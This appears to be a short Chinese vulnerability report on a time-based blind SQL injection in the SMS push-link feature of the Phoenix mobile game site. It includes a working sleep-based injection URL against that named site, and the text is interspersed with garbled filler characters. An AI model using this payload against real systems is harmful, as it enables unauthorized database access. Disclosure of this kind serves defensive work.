简要描述:) N( b8 V5 b/ B& f2 q: m
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
4 ]! R1 S0 l5 _4 ~* s
K3 \: {0 ?; p ~1 L详细说明:+ Y( u o3 ~4 L# [
存在SQL盲注url:
) ~9 k7 b1 f. H) d5 _fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
5 `4 C% Z5 W# i0 X# b a2 k7 \http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
) G" a' W& s6 [! Ahttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png/ [- u6 l1 s5 `) P3 G& _8 A
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
1 V* m, t0 j/ {6 G( R( e
+ P d/ J( f$ k' N7 W能看到mysql系统数据库,看来user权限应该很高的。。 |